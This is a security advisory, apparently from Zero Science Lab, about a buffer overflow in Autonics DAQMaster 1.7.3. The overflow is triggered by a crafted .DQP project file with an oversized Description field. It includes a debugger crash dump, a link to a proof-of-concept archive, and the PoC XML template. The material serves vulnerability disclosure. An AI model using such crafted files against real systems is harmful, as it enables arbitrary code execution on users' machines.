84 lines
No EOL
2.6 KiB
Text
84 lines
No EOL
2.6 KiB
Text
|
|
Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
|
|
|
|
|
|
Vendor: Autonics Corporation
|
|
Product web page: https://www.autonics.com
|
|
Affected version: 1.7.3 (build 2454)
|
|
1.7.0 (build 2333)
|
|
1.5.0 (build 2117)
|
|
|
|
Summary: DAQMaster is comprehensive device management program
|
|
that can be used with Autonics thermometers, panel meters,
|
|
pulse meters, and counters, etc and with Konics recorders,
|
|
indicators. DAQMaster provides GUI control for easy and convenient
|
|
management of parameters and multiple device data monitoring.
|
|
|
|
Desc: The vulnerability is caused due to a boundary error in the
|
|
processing of a project file, which can be exploited to cause a
|
|
buffer overflow when a user opens e.g. a specially crafted .DQP
|
|
project file with a large array of bytes inserted in the 'Description'
|
|
element. Successful exploitation could allow execution of arbitrary
|
|
code on the affected machine.
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
(ee8.1ee8): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
|
|
eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
|
|
DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
|
|
00405d45 8b10 mov edx,dword ptr [eax] ds:002b:41414141=????????
|
|
|
|
---------------------------------------------------------------------
|
|
|
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
Microsoft Windows 7 Ultimate SP1 (EN)
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5302
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
|
|
|
|
|
|
20.11.2015
|
|
|
|
--
|
|
|
|
|
|
thricer.dqp project PoC:
|
|
|
|
Proof of Concept:
|
|
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39393.zip
|
|
------------------------
|
|
|
|
<DAQMaster xmlns="http://www.w3.org/2001/XMLSchema-instance">
|
|
<Project>
|
|
<General>
|
|
<Name>Noname</Name>
|
|
<Company></Company>
|
|
<Worker></Worker>
|
|
<Description>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]</Description>
|
|
<DataFolder>C:\Users\zslab\Documents</DataFolder>
|
|
<DeskLayout>0</DeskLayout>
|
|
<NameRule></NameRule>
|
|
<FileType>0</FileType>
|
|
<RunMode>0</RunMode>
|
|
<Schedule Active="0"/>
|
|
<Layout>0</Layout>
|
|
</General>
|
|
<System/>
|
|
<UserTag/>
|
|
<DDEServer/>
|
|
<WorkSpace WorkSpaceNum="1">
|
|
<WorkSpace>DAQ WorkSpace</WorkSpace>
|
|
</WorkSpace>
|
|
<UIList/>
|
|
<Layout/>
|
|
</Project>
|
|
</DAQMaster> |